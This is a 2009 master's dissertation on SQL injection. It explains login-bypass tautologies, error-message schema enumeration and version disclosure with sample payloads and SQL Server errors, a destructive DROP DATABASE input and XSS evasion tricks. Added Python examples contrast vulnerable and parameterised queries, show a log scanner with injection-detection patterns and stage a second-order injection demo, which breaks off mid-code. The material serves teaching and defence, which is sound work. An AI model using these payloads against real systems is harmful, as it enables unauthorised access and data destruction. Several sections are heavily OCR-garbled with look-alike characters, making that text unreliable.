DcoM - Institutional Repository of A.E.I. Piraeus T.T. (Ιδρυματικό Αποθετήριο Α.Ε.Ι. Πειραιά Τ.Τ.)
KINGSTON UNIVERSITY

SQL INJECTION

Dissertation submitted for the Degree of Master of Science in Networking and Data Communications

By PARASKEVAKIS EMMANOUIL

SUPERVISOR: PANAGIOTIS KOTZANIKOLAOU

KINGSTON UNIVERSITY, SCHOOL OF COMPUTING AND INFORMATION SYSTEMS
TEI OF PIRAEUS, DEPARTMENTS OF ELECTRONICS AND AUTOMATION

JULY 2009

TABLE OF CONTENTS

ABSTRACT ..... 3
1 INTRODUCTION ..... 4
1.1 SQL commands and possible exploitations ..... 4
1.1.1 SELECT ..... 4
1.1.2 UNION SELECT ..... 5
1.2 Penetration attacks ..... 6
2 METHODOLOGIES FOR PENETRATION ATTACKS ..... 8
2.1 Authentication Mechanism shortcomings in Web applications ..... 8
2.2 Penetration testing techniques for web applications ..... 9
2.3 Cross Site Scripting ..... 10
3 DATABASE ATTACKS ..... 13
3.1 Different penetration attack techniques ..... 13
3.1.1 Obtaining Information Using Error Messages ..... 13
3.1.2 Acquiring Further Access ..... 18
3.1.3 Stored Procedures ..... 19
3.1.4 Second Order SQL Injection ..... 19
3.1.5 Weak input validation ..... 20
3.1.6 Privileges when connecting to databases ..... 21
3.1.7 Dynamic query interfaces ..... 23
3.1.8 Canonicalisation errors ..... 24
3.1.9 Differences between databases ..... 25
4 TOOLS FOR ATTACKS IMPLEMENTATION ..... 27
4.1 Tools classification ..... 28
4.2 Evaluating the Results ..... 28
4.3 Vulnerability scanning tools ..... 29
4.4 Common tool features ..... 30
5 LESSONS LEARNED, WAYS TO PROTECT FROM SQL INJECTIONS ..... 34
5.1 General steps towards SQL injection prevention ..... 34
5.2 Input sanitization ..... 35
5.3 SQL Injection Detection, database part ..... 39
5.4 Standard SQL Injection Testing ..... 39
5.5 Union Query SQL Injection Testing ..... 40
5.6 Blind SQL Injection Testing ..... 41
5.7 Stored Procedure Injection ..... 44
5.8 Data Validation Strategies ..... 44
5.8.1 Accept known good ..... 44
5.8.2 Reject known bad ..... 45
5.8.3 Sanitize ..... 45
6 CONCLUSION ..... 46
7 REFERENCES ..... 47

ABSTRACT

In this thesis the SQL injection vulnerability will be examined. By means of SQL injection the exploitation of SQL weaknesses concerning data access and modification, or the execution of high privileged operations, will be examined: execution of system commands, modification of the database (i.e. shutdown), exploitation of sensitive database data, recovering the contents of files in the database system, and the execution of SQL statements or modification of SQL tables. The (penetration) attacks will be examined in the same manner: interface/application specific and SQL specific. Moreover, a presentation of the tools that have been invented to determine the degree of vulnerability a database is exposed to, operating by the web interface or the application specific aspect and the SQL aspect, will take place. Defence mechanisms and their application possibilities to prevent such attacks will be examined. A summary "Lessons learned" chapter, analysing the possible defence mechanisms and the methods to avoid SQL injection attacks, will follow.

1 INTRODUCTION

SQL injection is a very common way to attack databases, mostly those having a web interface. Most of the times malicious code is passed via http queries which, when translated to SQL queries, could become dangerous for the database integrity, or just reveal information to unauthorised users. This form of attack is possible because in SQL there is no distinction between control and data planes.
Despite being relatively simple to protect against, there are numerous production systems connected to the Internet that are vulnerable to this type of attack. The main consequences are:
• Confidentiality: Frequent problem, especially to those databases where sensitive data are being held.
• Authentication: If no competent SQL sanitization is used to check user names and passwords, hacking into databases is possible.
• Authorization: Authorisation info stored in a SQL database might be read or altered via exploitation through a SQL injection.
• Integrity: Info stored in a SQL database could be either modified or deleted.
The above mentioned issues are platform (on which the SQL is run) independent. There are many means of defence against SQL injection attacks:
• Input validation/sanitisation on the application side
• Input validation/sanitisation of the SQL translated input via SQL routines and procedures
• Access rights management in SQL databases
To maintain security for SQL databases all other security measures have to be applied in the means of interacting with the SQL application: safe network architecture, IDS systems deployment, virus scanning, not to forget the physical security.

1.1 SQL commands and possible exploitations

1.1.1 SELECT

SELECT queries are used to retrieve information from a database. In a direct injection, all the arguments submitted will be used in the SQL query. If an "OR" or a WHERE statement is appended to the parameter's legitimate value and this input produces an error, direct injection is likely to take place by exploiting the error messages, e.g.
SQLString = "SELECT GivenName, SurName, Title FROM Employees WHERE Employee = " & EmployeeID

Moreover a SELECT query can be dangerous if combined with an "always true" statement.

1.1.2 UNION SELECT

SELECT queries are usually used by many web applications using variable content. These kinds of queries are sensitive in the WHERE clause, marking the condition which, if true, the SELECT query should give results for. The WHERE clause may be altered to provide results different than the ones requested by using a UNION SELECT command injected into the input fields. This way many SELECT queries will be executed by one single statement:

SELECT FirmId FROM Customers WHERE 1 = 1 UNION ALL SELECT FirmId FROM Vendors WHERE 1 = 1

This gives back as a result the records from the first and second queries altogether. ALL is required for some SELECT DISTINCT statements to be bypassed. Search functions may be using SQL queries containing LIKE clauses, i.e.

SQLString = "SELECT FirstName, LastName, Title FROM Employees WHERE LastName LIKE '%" & strLastNameSearch & "%'"

% is a wildcard, so in the command above WHERE would return true always where strLastNameSearch appears in LastName. If the query shall not be sending records, the value shall not be contained in the LastName field. Usually web applications append a percent sign and single quote, or parenthesis. The appended characters shall be mirrored in the WHERE parameters. If no value is added, LIKE "%%" will lead to all the records displaying.

1.2 Penetration attacks

SQL injections are attacks in which malicious code is inserted into strings that are later passed to an SQL server instance for execution. Usually the script is executed with the given variables and the injected string. Web sites usually have forms asking for username and password in input fields, and validation of users takes place later on that input. In a login query username and password are given as SQL variables. If these strings are inserted in certain code they can bypass the database security, giving access to unauthorised 3rd parties or, even worse, allow the modification and/or deletion of the database contents. The example below shows an unauthorised registration attempt (MS Access DB being used for this):

user = Request.form("user")
pass = Request.form("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open (dsn)
SQL = "SELECT C=COUNT(*) FROM users where pass='" & pass & "' and user='" & user & "'"
rs.open (sql,conn)
if rs.eof or rs.bof then
    response.write "Database Error"
else
    if rs("C") < 1 then
        response.write "Invalid Credentials"
    else
        response.write "Logged In"
    end if
end if
[5]

In this case the validity of the username and password variables is not checked. There should be checks on the inputs, even though any attacker is able to manipulate HTML commands and can bypass these restrictions. If someone was to submit the following input:

user: test' OR '1'='1
pass: test

the SQL that would really be executed would be:

SELECT * FROM users where pass='test' and user='test' OR '1' = '1'

This string sends the following command to the database: "access the data for which the following conditions are true: user and pass equal to 'test', or 1 equal to 1." The 1=1 condition is always true, i.e. the attacker will be successfully logged in.
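The login check above, rebuilt in Python against an in-memory SQLite table so the two ways of building the statement can be run side by side. This is an added example, not the dissertation's code: the `users` table, its one sample row, and the function names are constructed here. `login_concat` splices the input into the statement exactly as the ASP string concatenation does; `login_param` keeps the statement text fixed and binds the two values, so the `test' OR '1'='1` input from the text is compared as a username and matches nothing.

```python
"""Login check by string concatenation (as in the ASP example) beside a
parameterized version. Added example; table and sample row constructed here."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed 'users' table with a single legitimate account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_concat(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    """Vulnerable form, mirroring
    SQL = "SELECT C=COUNT(*) FROM users where pass='" & pass & "' and user='" & user & "'"
    Quotes inside the input become SQL syntax, so AND/OR precedence is rewritten."""
    sql = (f"SELECT COUNT(*) FROM users "
           f"WHERE password='{pw}' AND username='{user}'")
    return conn.execute(sql).fetchone()[0] >= 1


def login_param(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    """Hardened form: statement text is constant, values are bound by the driver."""
    sql = "SELECT COUNT(*) FROM users WHERE password=? AND username=?"
    return conn.execute(sql, (pw, user)).fetchone()[0] >= 1


def demo() -> dict:
    conn = make_db()
    bypass_user, bypass_pw = "test' OR '1'='1", "test"  # the input quoted in the text
    return {
        "concat_bypassed": login_concat(conn, bypass_user, bypass_pw),
        "param_bypassed": login_param(conn, bypass_user, bypass_pw),
        "param_legit": login_param(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())  # {'concat_bypassed': True, 'param_bypassed': False, 'param_legit': True}
```

Note that `login_param` also copes with a legitimate username containing an apostrophe, which the concatenated version turns into a syntax error (the "Database Error" branch of the ASP code).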
2 METHODOLOGIES FOR PENETRATION ATTACKS

2.1 Authentication Mechanism shortcomings in Web applications

A main vulnerability of Web based applications is the inability for strong authentication mechanisms. Web application environments, i.e. HTTP, HTTPS, HTML, CSS, JavaScript, do not provide sufficient security. The HTTP protocol provides two mechanisms for authentication: Basic and Digest. In both cases the stereotype request (server side) - response (client side) form of authentication takes place. In Basic authentication plain text is used. In the Digest authentication schema encryption is used in terms of a hash value, which is time dependant (nonce), a cryptographic key generated by the server. In the Figure below a typical database/user component diagram is presented:

[Figure: Database/user component diagram - Web, Firewall, Database; sample request to show.jsp with login and pass parameters] [31]

2.2 Penetration testing techniques for web applications

In order for a penetration to succeed all the environmental parameters for a defined system shall be used: web server software, operating system, scripting language, application etc. This kind of information can be retrieved by:
• HEAD and OPTIONS http requests. The header of such requests, in most cases, i.e. the SERVER string or another similar string, states the version of the web server and other parameters such as operating system or script environment.
• Analysing error messages. Special interest is attracted for specific error messages provided by a specific application, helping to recognise the application itself and possibly its version.
• Looking up for a certain directory structure for known and unknown file types, so that a different directory structure can be determined.
• Source code analysing. Specific code strings are being looked up so that software versions can be determined.
• Some input patterns are fed with invalid data so that scripting errors can be manipulated to expose the application environment. In Figure 1 below the web services variable (ItemID) has an erratic value only to expose the application environment:

[Figure 1: IE6 browser window, Address: http://www.example.com/shop.asp?ItemID=52; - Microsoft VBScript runtime error '800a000d' Type mismatch: 'CLng' /shop.asp, line 792] [2]

• TCP/ICMP and Service Fingerprinting: Fingerprinting tools exist which allow the penetration tester/attacker to determine which operating system and which application environment is running. Tools such as Nmap and Queso, or such as Amap and WebServerSP. NMAP and Queso use information from the specific host TCP/IP to draw conclusions about the operating system, the version of the kernel and the patchset of the web application. Those tools usually examine the server HTTP headers to retrieve such information.
• Blackbox Testing Method: Exception conditions are provoked in Web applications in terms of giving specific inputs, such as special characters, spaces, SQL scripting commands or requests in an invalid format. Web application responses are then being analysed.

2.3 Cross Site Scripting:

Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user [28]. Numerous coding errors allowing attacks of this kind can be found along Web applications. In such cases scripts containing malicious code are being sent to end users, leading to the possible handing over of session tokens, cookies, or even the whole accessed web page content. This is possible because browsers can not distinguish whether the script is to be trusted or not. XSS attacks can generally be categorized as stored or reflected. In Stored attacks the injected code has been stored in the attacked servers, i.e. not necessarily only in a database but in a message forum or elsewhere. End users accessing those sites acquire also the malicious scripts, together with the info requested.
In Reflected attacks the injected code can be contained in messages coming from the server, i.e. in error messages, results of a query etc. Reflected attacks reach the servers to affect by submitting routes such as email links or any other form of communication. These infections require the users' "cooperation" in terms of following a link or a form, which will then inject the malicious code in the web server to be "taken". The browser then executes the code as it came from a 'trusted' server. As far as consequences are concerned, it is indifferent whether attacks are stored or reflected, it is only a matter of the "route" used; also "Read only" sites can be infected by XSS attacks. The session cookie - a cookie used to identify the private session and maintain state between a user and a web application - is one of the favourite targets of XSS attacks. In such cases the session cookie is stolen and the attacker can take over the session. By XSS attacks also all the classic dangers can occur such as virus installation, redirection to another web page, content modification etc.

In order to make it more difficult for the web application owners to filter out malicious code using simple rules, such as filtering < or > symbols, attackers "hide" the malicious code by making the requests in Unicode or using versions which do not necessarily require < or > symbols. Usually embedded Javascripts are being used, but one can not exclude any active content such as ActiveX, VB scripts or Flash. This is the reason why the defence policy against such attacks should be filtering out anything deviating from the expected, rather than filtering known patterns of malicious code.

In many cases simple HTTP error messages from the web application servers, such as the 500 (internal server error) in requested pages, can be used to convey information regarding those servers. In those cases the exposure to a reflected cross site scripting attack is high. Many tools exist which in any case could assist attackers to explore the vulnerabilities of a web application and exploit them right after making injection attacks.

Common XSS Javascripting techniques [29]:
• embedding nested quotes: One can use escape quotes as follows \' or \" or the corresponding unicode characters \u0022 and \u0027
• keyword filters allowing all javascripts to execute e.g.: a='navi'; b='gator.userAgent';alert(eval(a+b))
• Embedded block scripting combined with insufficient input length filtering can lead to great exposure to harmful scripting if the code to be used for the scripting can be written in a single script source.
• In cases SSL is being used in web pages, there are usually warnings in case a script's origin is not trusted, giving a line of defence in regard with the origin of the code to be executed (supposing that trusted origins have not been taken over). This can be bypassed if images or e.g. .txt files can be uploaded on a server. If those files contain javascript commands the SSL origin warning can be bypassed, and possible input length filtering can be bypassed too.
• JavaScripts can be used to read entire web page contents and change form elements.
• Improper quotes syntax vulnerabilities can be exploited e.g. if we do not use any " or ', the injected " and ' are translated as \" and \' respectively. This adds another complexity factor if big scripts involving complex functionalities are to be used.

3 DATABASE ATTACKS

In this chapter the vulnerability part on the database in "injection" attacks will be examined.
The databases should be regarded as targets. The databases' vulnerability in such attacks could be easily detected and exploited by many tools, most of them downloadable for free from the Internet. No importance, or the least importance, to the web site traffic can be attributed to those attacks. Meta characters are used as input in interface forms, even the ones regarded as "safe". Those characters will be translated as commands in the control plane, as SQL does not have separate control and data planes. Any control character inserted as data in legitimate data channels is conveyed to SQL execution if no filtering takes place before or in between. The input injection problem may be eliminated through the use of more than a single channel for the data to be parsed. While sending code through other flaws, i.e. buffer overflows, needs a process to gain privileges, SQL injection uses legitimate means: for example, if an application's login account has database administrator rights, then an attacker (if no adequate safeguards exist) might be able to act with those rights. Common vulnerabilities that make data access code susceptible to such attacks are:
• insufficient validation of the input data,
• dynamic construction of SQL statements with no sanitisation of the input parameters,
• connection to the database through an account with over privileged rights.

3.1 Different penetration attack techniques

3.1.1 Obtaining Information Using Error Messages

• Case 1: plain SQL commands

If the database data is to be altered, the attacker needs to know the structure of its tables (at least the basic ones). For example, in the case below the 'users' table could have been created as follows:

create table users(
    id int,
    username varchar(255),
    password varchar(255),
    privs int
)

having the users below created:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff)
insert into users values( 0, 'guest', 'guest', 0x0000)
insert into users values( 0, 'chris', 'password', 0x00ff)
insert into users values( 0, 'fred', 'sesame', 0x00ff)
[5]

If an attacker is to create a new user account, he/she will have to know the structure of the 'users' table. If error messages occur, which is the expected thing to happen for ASP, the structure info of the whole database can be worked out by exploiting the error messages. Also, knowing the database's structure, if the attacker has created an account (even a low privileged one) he/she can have access to any database value that this created account has access to, through the ASP application used to connect to SQL Server. The examples below are typical regarding the steps that are followed so that an attacker can gain control of a database. First of all, the database's structure has to be explored. A 'select' statement using a 'having' clause could be useful for this.

Username: ' having 1=1--

By this input the following error is extracted from the (Microsoft SQL Server, for this case) database:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'usernames.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/process_userlog.asp, line 27

This error message gives away the table and column names of the first column of the query. A "GROUP BY" clause can be used to retrieve information about the other columns:

Username: ' group by usernames.id having 1=1--

The error that follows gives away another table element:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'usernames.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 27

Element by element the tables are being explored to the point that the username and password table structure is known:

' group by usernames.id, usernames.username, usernames.password, usernames.privs having 1=1--

... which produces no error, and is functionally equivalent to:

select * from users where username = ''

In our case, up to now the attackers know that the only table affected is the "users" table regarding the columns: id, username, password and privs. To perform the right queries to retrieve data or to overwrite values, the type of each column shall be detected. This can be easily done with the use of a 'type conversion' error message:

Username: ' union select sum(username) from usernames--

In this case SQL Server executes "sum" with priority over the restricting parameter, which is the equity of the two rowsets. This takes advantage of the fact that SQL Server attempts to apply the 'sum' clause before determining whether the number of fields in the two rowsets is equal. This would lead to the following error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
/process_login.asp, line 27

Indicating the type of the "username" field, i.e. "varchar". A way to calculate the data type of another rowset is to try to add another rowset, etc. If the rowset type is not "numerical" the relevant error message will appear.

Username: ' union select sum(id) from users--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/process_login.asp, line 27

Attackers can exploit any information given out of error messages about the database. One message relates to type conversion. If one attempts to convert a string into an integer, the error message to follow will reveal the whole string. In the example used, such a case reveals the version of the SQL server, the operating system - even its patchset level.

Username: ' union select @@version, 1, 1, 1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) July 6 2008 13:15:04 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2193: Service Pack 2)' to a column of data type int.
/process_login.asp, line 27

This command tries to convert the "@@version" constant to integer, as the first column in the 'users' table is integer. All values in all the database's tables can be read using the same way.

• Case 2: Web interfaced SQL injection via http

Suppose another case of a web connected database referring to writers, books, etc. accessible from the web, in which the URL could be used as input to execute SQL commands.
A typical URL to read a story out of this site would be the following:

http://stuart/homebase/practical/index.asp?story=1

In a query where nationality could be used a URL could look like:

http://stuart/homebase/practical/index_country.asp?country=laos

and the corresponding SQL query would be:

SELECT a.aID, a.aName FROM author a WHERE a.aNationality='laos'

In a MS-SQL 2000 database this statement would then cause an error message because of an unclosed quotation mark:

Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND a.aID=s.aID'.
/homebase/practical/index.asp, line 20

' AND a.aID=s.aID' implies that 2 tables are being used for this page, that a. and s. have been used as table aliases, and that aID defines the relationship between the tables. Next step for an attacker would be the finding of the actual names of the tables used. This kind of job can be performed using the parameters GROUP BY or HAVING, e.g.

http://stuart/homebase/practical/index.asp?story=3%20HAVING%201=1--

%20 is the Unicode character of space; -- is used for commenting out anything appended to the SQL statement from this point forward. This way the URL is translated into the following SQL statement:

SELECT s.sID, s.title, s.blurb, s.story, a.aName FROM story s, author a WHERE s.sID=3 HAVING 1=1-- AND a.aID=s.aID

The statement will cause the following error:

Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 's.sID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/homebase/practical/index.asp, line 15

By the error the attacker gets the information that a column named s.sID is contained in the database. This error has arisen because of the use of HAVING: a GROUP BY shall also be used, grouping all the fields until the error ceases to exist. The only thing the attacker shall do is look across the fields. This is how this could be performed:

http://stuart/homebase/practical/index.asp?story=3%20group%20by%20s.sID%20having%201=1--

in which case the s.sID field is inserted within the URL, which will cause the next error.

Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 's.title' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/homebase/practical/index.asp, line 20

by which the attacker is informed that next to s.sID is the column s.title. This piece of information can now be inserted in the URL again:

http://stuart/homebase/practical/index.asp?story=3%20group%20by%20s.sID,s.title%20having%201=1--

which once again produces an "informative" error:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 's.blurb' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/homebase/practical/index.asp, line 20

which then reveals the next column's name, and so on and so forth.
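The probing walked through in 3.1.1 leaves a recognisable trail in the web server's access log: the same request path receiving HAVING, GROUP BY, UNION SELECT and @@version in a query parameter, each answered with a 500 as the database error is fed back. The reviewer below is an added example and not part of the dissertation; it decodes each query parameter (repeatedly, so a double-encoded `%2520` is still seen as a space) and matches only the probe shapes quoted in the text. The log lines are constructed here in Common Log Format and reuse the page's URLs.

```python
"""Access-log review for the error-message probing of 3.1.1. Added example;
rules come from the probes quoted in the text, log lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Request line and status code of a Common Log Format entry.
CLF_REQUEST = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Signatures taken from the probes quoted in the text; applied to decoded values.
RULES = [
    ("having-probe", re.compile(r"\bhaving\s+1\s*=\s*1", re.I)),
    ("group-by-probe", re.compile(r"\bgroup\s+by\b", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version-disclosure", re.compile(r"@@version", re.I)),
    ("quote-comment-trailer", re.compile(r"'.*--\s*$")),
]

# Constructed sample log (Common Log Format); paths are the ones shown in the text.
LOG_LINES = [
    '10.0.0.5 - - [12/Jul/2009:10:01:02 +0300] "GET /homebase/practical/index.asp?story=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Jul/2009:10:01:09 +0300] "GET /homebase/practical/index.asp?story=3%20HAVING%201=1-- HTTP/1.1" 500 812',
    '10.0.0.5 - - [12/Jul/2009:10:01:15 +0300] "GET /homebase/practical/index.asp?story=3%20group%20by%20s.sID%20having%201=1-- HTTP/1.1" 500 830',
    '10.0.0.9 - - [12/Jul/2009:10:02:40 +0300] "GET /process_login.asp?username=%27%20union%20select%20%40%40version%2C1%2C1%2C1-- HTTP/1.1" 500 1200',
    '10.0.0.7 - - [12/Jul/2009:10:03:01 +0300] "GET /homebase/practical/index_country.asp?country=laos HTTP/1.1" 200 3000',
]


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly but boundedly: %2520 -> %20 -> ' '."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_params(target: str) -> list:
    """(parameter, [rule names]) for every query parameter that trips a rule."""
    findings = []
    # parse_qsl decodes one layer itself; decode_fully handles extra layers.
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw)
        rules = [rule for rule, rx in RULES if rx.search(value)]
        if rules:
            findings.append((name, rules))
    return findings


def scan_log(lines) -> list:
    """One dict per suspicious request: 1-based line number, status, parameter, rules.
    A 500 beside a probe is the pattern the text describes: a verbose error fed back."""
    report = []
    for n, line in enumerate(lines, start=1):
        m = CLF_REQUEST.search(line)
        if not m:
            continue
        for param, rules in scan_params(m.group("target")):
            report.append({"line": n, "status": int(m.group("status")),
                           "param": param, "rules": rules})
    return report


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit)
```

Running it over the constructed log flags lines 2, 3 and 4 and nothing else; the pairing of a probe with a 500 status is what a practitioner would alert on, because it means the error text reached the client.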
Given tl1e fact ιl1at the opeι·ating system οΓ the seι·νeΓ is usιιally known tl1is gives a gΓeat poweι- 18 on the attacker to do almost what l1e/she wanιs to tl1e seινeΓ. Sοιηe ot l1eΓ kinds of ιηίsιιse coιιld be the nιnning of qιιeι·ies to otheι· seΓveι·s οι· the execιιιion of pιΌceduΓes stoι·ed ίη tl1c seινeΓ itsclf. Mostly dangeι·ous is tl1e fact t\1at ActiveX applications can be cι-eated to ιηakc aιιtomatic scΓipts which will be tl1en execιιted fιΌm tl1e seινeΓ. This can be peι·foι·med by the ιιse ofOACreate, sp_OAMethod and sp_OAGetPropeΓty systen1 stoι·ed pωcedιιι·es. Of cοιιΓse cι·eation/deletion/editing of fi]es οη tJ1e seΓνcι· is one οΓ tl1e ιηοsι con1111on tl1ings to be done in sιιch attacks. 3.1.3 Stoι-ed Pωceduι·es T11e use of stoι·ed pIOceduΓes , peι·Γοι·m. qιιcιΎ ιιsua lly ιηakes SQL injection attacks 1110Γe difficult to This depends of couΓse οη the implen1entation of the scι·ipting. wit/1 paι·aιηeteΓs, and taking ca ι·e of tl1e secuΓity CΓeaιing ofΊ l1e υseι· sιιpplied a value assigning to those paι-an1eteι·s, it is difficult to inject so ιη eι l1ing in the database ιhcιι coιι ld be execιιted ίη ι·esu lts (witl1 Jin1ited tl1e contΙΌ I plane. The only possibi lity tl1en fοι· an SQL injection thougl1) coιιld be tl1e n1anipιιlation of tl1e ηοη data paτts. 3.1.4 Second Ordeι- SQL Injection Α Ιίηe off defence against web application inpιιt attacks is the limitation of tl1e lengt/1 of the inpιιt otheΓ "syntax be tl1at νeιΎ ιηιιcl1 coιιld be possibly oΓiented" sιιch sιιbιηitted in a qιιeιΎ. as limiting of tl1e single This liιηitation along witl1 qιιote cl1aΓacteΓ ιιsage eff'ective by tl1emselves, as tl1ere aΓe ways fοι· an attackeΓ to can not oveι·come those obstacles. If the ιιseι· inpιιt is being Γeu sed also elsewheΓe ίη t11e application tl1en the injection danger ι·emains. This kind of injection is called second οι-deΓ injection. 
Therefore all the "syntax oriented" measures that are being used for the database part, such as input length limiting and single quote usage limiting, shall be applied also to the application part. In case multiple or long user inputs are required then the danger of input injection is present, as an attacker may exploit the data length available to write injection code. As an example of a single quote limiter, the VBScript 'replace' [3] can be used for sanitising function input data:

function escape(input)
    input = replace(input, "'", "''")
    escape = input
end function

3.1.5 Weak input validation

In a database expecting numerical values as input suppose the following input:

'; DROP DATABASE pubs --

The dynamic SQL statement executed could look like this:

SqlDataAdapter myCommand = new SqlDataAdapter(
    "SELECT au_lname, au_fname FROM authors WHERE au_id = '" + SSN.Text + "'", myConnection);

The developer's intention was that when the code runs, it inserts the user's input and generates the following SQL statement:

SELECT au_lname, au_fname FROM authors WHERE au_id = '123-12-1234'

Instead, the code generates the following query:

SELECT au_lname, au_fname FROM authors WHERE au_id = ''; DROP DATABASE pubs --'

In this case, the ' (single quotation mark) character that starts the input terminates the current string literal in the SQL statement. It closes the current statement only if the following parsed token does not make sense as a continuation of the current statement, but does make sense as the start of a new statement. As a result, the opening single quotation mark character of the input results in the following statement:
SELECT au_lname, au_fname FROM authors WHERE au_id = ''

The semicolon suggests that this is the end of the statement, and it is followed by the malicious SQL code below:

; DROP DATABASE pubs

The semicolon is not necessarily required to separate SQL statements; this is dependent on the SQL vendor or implementation. Finally, the -- (double dash) is a SQL comment that tells SQL to ignore the rest of the text. In this case, SQL ignores the closing ' (single quotation mark) character, which would otherwise cause a SQL parser error.

3.1.6 Privileges when connecting to databases

Due to the hierarchical inheritance of privileges granted to other roles, a user could inherit privileges they should never be granted. In Oracle there is no specific DENY statement in the basic privilege commands. Microsoft's SQL Server has the ability to specifically DENY a Role or a privilege to a user, but Oracle does not. Oracle's database privilege structure was designed before security at the database was of great concern. It is essential to enumerate the privileges of all users and Roles, paying special attention to the PUBLIC role, which has many object privileges granted to it which are not always required. "ANY" privileges are to be avoided when possible, such as CREATE ANY PROCEDURE, which gives the user the ability to create a procedure in another user's schema. PL/SQL procedures, by default, run with the privileges of the schema within which they are created, no matter who invokes the procedure. In order for a PL/SQL package to run with invoker's rights, AUTHID CURRENT_USER has to be explicitly written into the package.
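To make the contrast drawn in 3.1.4 and 3.1.5 concrete, here is an added example written for this edit; it is not code from the dissertation nor from the VBScript and MSDN sources it quotes. It uses Python's standard sqlite3 module (SQLite in memory rather than SQL Server or MySQL, which changes nothing about the mechanism), ports the VBScript quote-doubling limiter, and runs two scenarios: the tautology-plus-comment login bypass against a string-built query versus a parameterised one, and a second order case where a username that was escaped at registration time is later reused unescaped in a password-change query. The users table, the account names, the passwords and the payload strings are all constructed for the demo.

```python
import sqlite3


def new_db():
    """Constructed sample schema with one privileged account (assumption for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct horse')")
    conn.commit()
    return conn


def escape_quotes(value):
    """Python port of the VBScript replace(input, "'", "''") limiter from 3.1.4."""
    return value.replace("'", "''")


# --- 3.1.5: the string-built query, and the same lookup with bound parameters ----

def login_concat(conn, username, password):
    # Same shape as the SqlDataAdapter example: the input becomes part of the SQL text.
    sql = ("SELECT id FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_param(conn, username, password):
    # Bound parameters reach the engine as data, never as SQL text.
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# --- 3.1.4: escaping at the entry point, then reusing the stored value ----------

def register(conn, username, password):
    # First-order defence only: quotes are doubled so the INSERT is well formed,
    # but the stored username still contains the quote.
    sql = ("INSERT INTO users (username, password) VALUES ('"
           + escape_quotes(username) + "', '" + escape_quotes(password) + "')")
    conn.execute(sql)
    conn.commit()


def change_password_concat(conn, stored_username, new_password):
    # stored_username was read back from the users table and is treated as trusted,
    # so it is concatenated unescaped: this is the second order injection point.
    sql = ("UPDATE users SET password='" + escape_quotes(new_password)
           + "' WHERE username='" + stored_username + "'")
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def change_password_param(conn, stored_username, new_password):
    cur = conn.execute("UPDATE users SET password=? WHERE username=?",
                       (new_password, stored_username))
    conn.commit()
    return cur.rowcount


def password_of(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


def demo():
    """Runs both scenarios and returns the observable results."""
    results = {}

    # Scenario 1: tautology plus comment in the username (constructed payload).
    conn = new_db()
    payload = "' OR '1'='1' --"
    results["concat_bypass"] = login_concat(conn, payload, "wrong")  # admin's id comes back
    results["param_bypass"] = login_param(conn, payload, "wrong")    # nothing matches

    # Scenario 2: a username that is harmless when inserted, harmful when reused.
    attacker = "admin'--"
    register(conn, attacker, "attacker-pass")
    # Builds: UPDATE users SET password='owned' WHERE username='admin'--'
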